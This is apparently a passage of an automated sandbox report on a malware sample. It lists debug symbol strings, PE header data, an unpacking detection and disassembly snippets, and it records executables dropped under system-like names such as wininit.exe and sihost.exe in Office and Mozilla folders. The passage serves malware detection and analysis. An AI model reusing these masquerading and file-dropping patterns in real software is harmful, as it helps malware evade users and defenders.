                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: hC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: oC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: fC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: xC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: }C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hT7clR9Gz2.exe
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: gC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ~C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: iC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: lC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: yC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: mC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: hT7clR9Gz2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: hT7clR9Gz2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: hT7clR9Gz2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: hT7clR9Gz2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: hT7clR9Gz2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                          Data Obfuscation

                          barindex
                          Detected unpacking (creates a PE file in dynamic memory)
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeUnpacked PE file: 6.2.hyperbrokerhostNetsvc.exe.3080000.2.unpack
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeFile created: C:\PortCommon\__tmp_rar_sfx_access_check_7217609Jump to behavior
                          Source: hT7clR9Gz2.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF640 push ecx; ret 0_2_007DF653
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DEB78 push eax; ret 0_2_007DEB96
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF848F100BD pushad ; iretd 6_2_00007FF848F100C1
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF84915317F push edi; iretd 6_2_00007FF849153182
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF849154D87 pushad ; ret 6_2_00007FF849154D88
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F67967 push ebx; retf 12_2_00007FF848F6796A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF84910EE99 push edi; iretd 12_2_00007FF84910EE9A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF84910E515 pushad ; iretd 12_2_00007FF84910E517
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF84915317F push edi; iretd 12_2_00007FF849153182
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF849154D87 pushad ; ret 12_2_00007FF849154D88
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8495CDA26 push E8FFFFFEh; retf 12_2_00007FF8495CDA31

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files with benign system names
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\rZIMgllI.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\WSdqVQmD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\mmqNDpWU.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\VWqPFTQA.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\YQFyrQBy.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\aSrhMzGt.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\qtoWZHQP.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\PortCommon\sihost.exeJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\RFZqtRqa.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\VeZikCqF.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\HAEBtuve.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\sDsEbPBc.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\AyILZeLM.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\DjncgsWF.logJump to dropped file
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeFile created: C:\PortCommon\hyperbrokerhostNetsvc.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\NcaIHEGQ.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\dqepydAD.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\ZzoyrgAK.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\CNmCQxgq.logJump to dropped file
